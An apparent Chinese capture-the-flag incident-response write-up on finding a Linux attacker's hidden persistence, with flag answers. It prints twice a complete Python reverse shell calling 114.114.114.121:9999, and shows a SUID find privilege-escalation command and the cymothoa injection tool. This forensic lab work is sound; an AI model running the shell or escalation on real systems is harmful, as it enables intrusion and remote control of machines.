玄机应急响应-第三章
权限维持-linux权限维持-隐藏
一,黑客隐藏的隐藏的文件 完整路径md5
发现/tmp下存在可疑的.temp文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/usr/bin/python3
import socket,subprocess,os,sys, time
pidrg = os.fork()
if pidrg > 0:
sys.exit(0)
os.chdir("/")
os.setsid()
os.umask(0)
drgpid = os.fork()
if drgpid > 0:
sys.exit(0)
while 1:
try:
sys.stdout.flush()
sys.stderr.flush()
fdreg = open("/dev/null", "w")
sys.stdout = fdreg
sys.stderr = fdreg
sdregs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sdregs.connect(("114.114.114.121",9999))
os.dup2(sdregs.fileno(),0)
os.dup2(sdregs.fileno(),1)
os.dup2(sdregs.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
sdregs.close()
except Exception:
pass
time.sleep(2)
$ cat /tmp/.temp/libprocesshider/1.py
flag{109ccb5768c70638e24fb46ee7957e37}
二,黑客隐藏的文件反弹shell的ip+端口 {ip:port}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/usr/bin/python3
import socket,subprocess,os,sys, time
pidrg = os.fork()
if pidrg > 0:
sys.exit(0)
os.chdir("/")
os.setsid()
os.umask(0)
drgpid = os.fork()
if drgpid > 0:
sys.exit(0)
while 1:
try:
sys.stdout.flush()
sys.stderr.flush()
fdreg = open("/dev/null", "w")
sys.stdout = fdreg
sys.stderr = fdreg
sdregs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sdregs.connect(("114.114.114.121",9999))
os.dup2(sdregs.fileno(),0)
os.dup2(sdregs.fileno(),1)
os.dup2(sdregs.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
sdregs.close()
except Exception:
pass
time.sleep(2)
$ cat /tmp/.temp/libprocesshider/1.py
flag{114.114.114.121:9999}
三,黑客提权所用的命令 完整路径的md5 flag{md5}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
ctf:x:1000:33::/home/ctf:
sslh:x:104:108::/nonexistent:/bin/false
$ cat /etc/passwd
查看用户列表
1
2
3
4
5
6
7
8
9
10
11
12
13
14
/bin/mount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/find
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
$ find / -perm -u=s -type f 2>/dev/null
切换到ctf用户发现find命令可以提权
/usr/bin/find . -exec /bin/sh \; -quit
flag{7fd5884f493f4aaf96abee286ee04120}
四,黑客尝试注入恶意代码的工具完整路径md5
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
root@xuanji:/tmp/.temp/libprocesshider# find / -name '.*' 2>/dev/null|grep -v 'sys'
/etc/.pwd.lock
/etc/cron.d/.placeholder
/etc/cron.daily/.placeholder
/etc/cron.hourly/.placeholder
/etc/cron.monthly/.placeholder
/etc/cron.weekly/.placeholder
/etc/init.d/.legacy-bootordering
/etc/skel/.bash_logout
/etc/skel/.bashrc
/etc/skel/.profile
/etc/mysql/conf.d/.keepme
/home/ctf/.bash_logout
/home/ctf/.bashrc
/home/ctf/.profile
/home/ctf/.bash_history
/opt/.cymothoa-1-beta
/root/.bashrc
/root/.profile
/root/.bash_history
/root/.viminfo
/root/.ssh
/root/.cache
/run/secrets/kubernetes.io/serviceaccount/..data
/run/secrets/kubernetes.io/serviceaccount/..2024_06_08_05_37_51.4144190794
/tmp/.temp
/tmp/.temp/libprocesshider/.git
/tmp/.temp/libprocesshider/.gitignore
/usr/share/php/.registry
/.dockerenv
搜索发现/opt/.cymothoa-1-beta是一个注入工具,/opt/.cymothoa-1-beta/cymothoa
flag{087c267368ece4fcf422ff733b51aed9}
五,使用命令运行 ./x.xx 执行该文件 将查询的 Exec** 值 作为flag提交 flag{/xxx/xxx/xxx}
1
2
3
4
5
6
7
8
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 10/sshd
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 11/apache2
tcp 0 1 10.244.4.78:53068 114.114.114.121:9999 SYN_SENT 588/python3
tcp 0 0 10.244.4.78:22 10.244.0.1:45653 ESTABLISHED 446/1
tcp6 0 0 :::22 :::* LISTEN 10/sshd
$ netstat -lanpt
运行后查看网络连接
1
/usr/bin/python3./1.py
$ cat /proc/588/cmdline
1
/usr/bin/python3
$ which python3
1
lrwxrwxrwx. 1 root root 9 Mar 23 2014 /usr/bin/python3 -> python3.4
$ ls -lah /usr/bin/python3
flag{/usr/bin/python3.4}
This post is licensed under CC BY 4.0 by the author.